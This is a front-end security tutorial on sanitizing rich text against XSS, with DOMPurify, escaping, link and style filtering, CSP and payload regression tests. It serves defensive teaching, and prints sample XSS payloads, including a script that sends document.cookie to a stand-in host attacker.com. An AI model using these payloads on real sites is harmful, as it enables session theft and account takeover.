Security Handling of Rich Text Input (e.g., XSS Filtering)
Rich text input is a common feature in web applications, allowing users to input formatted content such as bold, italics, links, etc. However, this also introduces significant security risks, particularly cross-site scripting (XSS) attacks. Attackers can inject malicious scripts to steal user data or perform unauthorized actions. Therefore, properly handling rich text input is a critical aspect of front-end security.
Basic Principles of XSS Attacks
XSS attacks are generally categorized into three types: stored, reflected, and DOM-based. Rich text input is most likely to trigger stored XSS because user-submitted content is persisted in the database and rendered on the page when accessed by other users. For example:
<script>alert('XSS');</script>
If this script is rendered directly on the page without processing, the browser executes it and shows the alert dialog. A more dangerous scenario is an attacker stealing user session information via document.cookie:
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
Basic Strategies for Filtering Rich Text
Whitelist Filtering
Whitelist filtering is the most common defense mechanism, allowing only specific HTML tags and attributes to pass. For example, permitting basic tags like <b>, <i>, and <a>, while prohibiting dangerous tags like <script> and <iframe>. Here’s an example using the DOMPurify library:
import DOMPurify from 'dompurify';
const dirtyHtml = '<script>alert("XSS")</script><b>Safe text</b>';
const cleanHtml = DOMPurify.sanitize(dirtyHtml, {
  ALLOWED_TAGS: ['b', 'i', 'a'],
  ALLOWED_ATTR: ['href', 'title']
});
console.log(cleanHtml); // Output: <b>Safe text</b>
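The allowlist idea itself does not depend on any particular library. The following is a minimal sketch, assuming the HTML has already been parsed into a tree of plain objects. The node shape (tag, attrs, children, text) and the names POLICY, DROP_WITH_CONTENT, and filterNode are hypothetical and are not part of DOMPurify's API.

```javascript
// Hypothetical allowlist policy: tag name -> attributes permitted on that tag.
const POLICY = new Map([
  ['b', []],
  ['i', []],
  ['a', ['href', 'title']],
]);

// Tags whose content is dropped entirely instead of being unwrapped.
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe']);

// Returns a filtered copy of `node`, an array of unwrapped children, or null.
function filterNode(node) {
  if (typeof node.text === 'string') {
    return { text: node.text }; // text is kept; it must be escaped when serialized
  }
  const tag = node.tag.toLowerCase();
  if (DROP_WITH_CONTENT.has(tag)) return null;

  const children = (node.children || []).flatMap((child) => {
    const kept = filterNode(child);
    return kept === null ? [] : kept; // arrays of unwrapped children are flattened
  });

  const allowedAttrs = POLICY.get(tag);
  if (!allowedAttrs) return children; // unknown tag: keep its children, drop the tag

  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs || {})) {
    const lower = name.toLowerCase();
    if (allowedAttrs.includes(lower)) attrs[lower] = value;
  }
  return { tag, attrs, children };
}
```

Anything not named in the policy is removed by default, so a tag or attribute the author never thought about cannot slip through. Attribute values that survive, such as href, still need their own validation.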
Escaping Special Characters
For scenarios where HTML tags do not need to be preserved, special characters can be escaped directly. For example, converting < to &lt; and > to &gt;. This prevents HTML injection when the escaped value is placed in element content or a quoted attribute value:
function escapeHtml(unsafe) {
  // Replace & first so the entities produced below are not escaped twice
  return unsafe
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}
const userInput = '<script>alert("XSS")</script>';
console.log(escapeHtml(userInput)); // Output: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
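Escaping is easy to forget when markup is assembled by string concatenation. One way to make it the default is a tagged template that escapes every interpolated value. This is a sketch only: safeHtml is a hypothetical helper name, and the block carries its own copy of the escaping function so that it runs on its own.

```javascript
// Escapes the five characters that are significant in HTML text and quoted attributes.
function escapeHtml(unsafe) {
  return String(unsafe)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Hypothetical tagged-template helper: literal parts pass through unchanged,
// interpolated values are always escaped.
function safeHtml(strings, ...values) {
  return strings.reduce(
    (out, part, i) => out + part + (i < values.length ? escapeHtml(values[i]) : ''),
    ''
  );
}

const comment = '<img src=x onerror=alert(1)>';
console.log(safeHtml`<p class="comment">${comment}</p>`);
// → <p class="comment">&lt;img src=x onerror=alert(1)&gt;</p>
```

This only covers values placed in element content or quoted attribute values. Values written into script blocks, URLs, or CSS need escaping rules specific to those contexts.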
Handling Links and Events in Rich Text
Even if <a> tags are allowed, caution is needed for malicious content in the href attribute, such as JavaScript protocols:
<a href="javascript:alert('XSS')">Click me</a>
A whitelist can restrict the allowed protocols to http, https, and mailto:
const dirtyLink = '<a href="javascript:alert(\'XSS\')">Click me</a>';
const cleanLink = DOMPurify.sanitize(dirtyLink, {
  ALLOWED_TAGS: ['a'],
  ALLOWED_ATTR: ['href'],
  ALLOWED_URI_REGEXP: /^(https?|mailto):/i
});
console.log(cleanLink); // Output: <a>Click me</a> (href is removed)
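A pattern anchored on https?: or mailto: will not match relative URLs such as /about, which may or may not be what the application wants. An alternative sketch is to let the platform's URL parser decide the protocol, resolving relative links against a base first. The names ALLOWED_PROTOCOLS and isSafeHref and the placeholder base URL are assumptions made for illustration.

```javascript
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

// Hypothetical helper: true only if `href` resolves to an allowed protocol.
// Relative URLs are resolved against a placeholder base, so they count as https.
function isSafeHref(href) {
  try {
    const url = new URL(href, 'https://placeholder.invalid/');
    return ALLOWED_PROTOCOLS.has(url.protocol);
  } catch {
    return false; // input the parser rejects is treated as unsafe
  }
}

console.log(isSafeHref("javascript:alert('XSS')")); // → false
console.log(isSafeHref('https://example.com/page')); // → true
console.log(isSafeHref('/about')); // → true
```

Because the parser normalizes the scheme before the check, mixed-case variants such as JaVaScRiPt: are handled the same way as the lowercase form.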
Similarly, event handler attributes like onclick and onmouseover must be prohibited:
<div onclick="alert('XSS')">Click me</div>
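Event handler attributes all begin with on, so a filter can match that prefix instead of enumerating individual names. The sketch below assumes the attributes are available as a plain object; stripEventAttributes is a hypothetical helper, not a library function.

```javascript
// Hypothetical helper: returns a copy of `attrs` without event handler attributes.
// HTML attribute names are case-insensitive, so the name is lowercased before the check.
function stripEventAttributes(attrs) {
  return Object.fromEntries(
    Object.entries(attrs).filter(([name]) => !name.toLowerCase().startsWith('on'))
  );
}

console.log(stripEventAttributes({ onclick: "alert('XSS')", title: 'Greeting' }));
// → { title: 'Greeting' }
```

A prefix check covers handlers that a hand-written list would miss, but an attribute allowlist is still the stronger default because it also removes attributes that are dangerous for other reasons.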
Handling CSS and Style Injection
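The style attribute in rich text can also be abused, for example through CSS expression() values, which legacy versions of Internet Explorer evaluated as script, or through url() references that load attacker-controlled resources: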
<div style="background: expression(alert('XSS'))">Styled content</div>
The solution is to restrict the content of the style attribute or prohibit it entirely:
const dirtyStyle = '<div style="background: expression(alert(\'XSS\'))">Content</div>';
const cleanStyle = DOMPurify.sanitize(dirtyStyle, {
  ALLOWED_TAGS: ['div'],
  FORBID_ATTR: ['style']
});
console.log(cleanStyle); // Output: <div>Content</div>
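Where some inline styling has to be kept, restricting the content of the style attribute could look like the following sketch. The property list, the SUSPICIOUS_VALUE pattern, and the filterStyle name are assumptions chosen for illustration. The splitting on semicolons is deliberately naive and relies on the value check to reject anything complex.

```javascript
// Hypothetical policy: only these CSS properties survive.
const ALLOWED_PROPERTIES = new Set(['color', 'font-size', 'font-weight', 'text-align']);

// Values with function calls, quotes, escapes, at-rules, markup, or comments are rejected.
const SUSPICIOUS_VALUE = /[()\\@<>"']|\/\*/;

// Returns a cleaned style string containing only allowed, simple declarations.
function filterStyle(style) {
  return style
    .split(';')
    .map((decl) => {
      const idx = decl.indexOf(':');
      if (idx === -1) return null;
      const prop = decl.slice(0, idx).trim().toLowerCase();
      const value = decl.slice(idx + 1).trim();
      if (!ALLOWED_PROPERTIES.has(prop) || value === '' || SUSPICIOUS_VALUE.test(value)) {
        return null;
      }
      return `${prop}: ${value}`;
    })
    .filter((decl) => decl !== null)
    .join('; ');
}

console.log(filterStyle("color: red; background: expression(alert('XSS')); font-size: 14px"));
// → color: red; font-size: 14px
```

Rejecting every value that contains parentheses also blocks legitimate ones such as rgb(...) colors. That trade-off favors safety and can be relaxed with a stricter per-property value check.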
Server-Side and Client-Side Collaborative Defense
Front-end filtering cannot replace server-side validation. Attackers may bypass the front end and submit malicious data directly to the API. Therefore, the server must also filter rich text:
// Node.js example (using dompurify with jsdom)
const express = require('express');
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

// Create the jsdom window and the DOMPurify instance once, not on every request
const window = new JSDOM('').window;
const purify = createDOMPurify(window);

const app = express();
app.use(express.json());

app.post('/save-content', (req, res) => {
  const dirtyHtml = req.body.content;
  const cleanHtml = purify.sanitize(dirtyHtml, { ALLOWED_TAGS: ['b', 'i'] });
  // Store cleanHtml in the database
  res.send({ success: true });
});
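Since a request sent directly to the API can carry any JSON value, it can help to check the shape of the payload before it reaches the sanitizer. The following is a minimal sketch under that assumption; validateContent and MAX_CONTENT_LENGTH are hypothetical names, and the limit is an arbitrary example value.

```javascript
const MAX_CONTENT_LENGTH = 20000; // hypothetical limit; tune for the application

// Hypothetical pre-check run before sanitizing: accepts only plain strings of bounded length.
function validateContent(body) {
  const content = body && body.content;
  if (typeof content !== 'string') {
    return { ok: false, error: 'content must be a string' };
  }
  if (content.length > MAX_CONTENT_LENGTH) {
    return { ok: false, error: 'content is too long' };
  }
  return { ok: true, content };
}

console.log(validateContent({ content: ['<script>alert(1)</script>'] }).ok); // → false
console.log(validateContent({ content: '<b>Hello</b>' }).ok); // → true
```

A route handler could respond with status 400 when ok is false and pass content to the sanitizer otherwise.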
Security Configuration for Rich Text Editors
Common rich text editors (e.g., TinyMCE, CKEditor) provide security configuration options. For TinyMCE:
tinymce.init({
  selector: '#editor',
  plugins: 'link',
  valid_elements: 'b,i,a[href|title]',
  valid_styles: { '*': 'color,font-size' },
  content_security_policy: "script-src 'self'"
});
The Supplementary Role of Content Security Policy (CSP)
Even if rich text is filtered, CSP can serve as a last line of defense. For example, the following policy blocks inline scripts and only allows scripts loaded from the page's own origin:
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
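When the policy is maintained in application code, keeping the directives in an object and serializing them avoids hand-editing one long string. This is a sketch only, and buildCsp is a hypothetical helper name.

```javascript
// Hypothetical helper: serializes a directive map into a Content-Security-Policy header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

const policy = buildCsp({
  'default-src': ["'self'"],
  'script-src': ["'self'"],
  'style-src': ["'self'"],
});
console.log(policy);
// → default-src 'self'; script-src 'self'; style-src 'self'
```

In a Node.js server the resulting string would be sent as the value of the Content-Security-Policy response header, for example with res.setHeader.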
Real-World Case Analysis
A social platform once suffered a stored XSS attack due to insufficient rich text filtering. Attackers injected the following content into user profiles:
<img src="x" onerror="stealCookies()">
The fix involved upgrading the filtering library and restricting event attributes like onerror:
DOMPurify.sanitize(userInput, {
  FORBID_ATTR: ['onerror', 'onload'],
  FORBID_TAGS: ['img']
});
Continuous Monitoring and Updates
XSS attack methods evolve constantly, so filtering rules must be updated regularly. For example, SVG tags and data: URLs have also been abused:
<svg><script>alert('XSS')</script></svg>
The solution is to update libraries like DOMPurify promptly and stay informed about new vulnerability announcements.
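One way to notice regressions after a library upgrade or a rule change is to keep a corpus of known payloads and run it through the sanitizer on every build. The sketch below assumes the sanitizer is passed in as a function. PAYLOADS, FORBIDDEN, and findLeaks are hypothetical names, and the patterns are crude textual markers rather than a real HTML analysis, so they can produce false positives on escaped output.

```javascript
// Payloads taken from this article; extend the list as new bypasses are published.
const PAYLOADS = [
  "<script>alert('XSS');</script>",
  "<a href=\"javascript:alert('XSS')\">Click me</a>",
  '<img src="x" onerror="stealCookies()">',
  "<svg><script>alert('XSS')</script></svg>",
];

// Crude markers that should not survive sanitization.
const FORBIDDEN = [/<script/i, /javascript:/i, /\son\w+\s*=/i];

// Hypothetical harness: returns the payloads whose sanitized output still matches a marker.
function findLeaks(sanitize, payloads = PAYLOADS) {
  return payloads.filter((payload) => {
    const output = sanitize(payload);
    return FORBIDDEN.some((pattern) => pattern.test(output));
  });
}

// A sanitizer that returns its input unchanged leaks every payload.
console.log(findLeaks((html) => html).length); // → 4
```

In a real project the function passed in would wrap the production sanitizer configuration, and a non-empty result would fail the build.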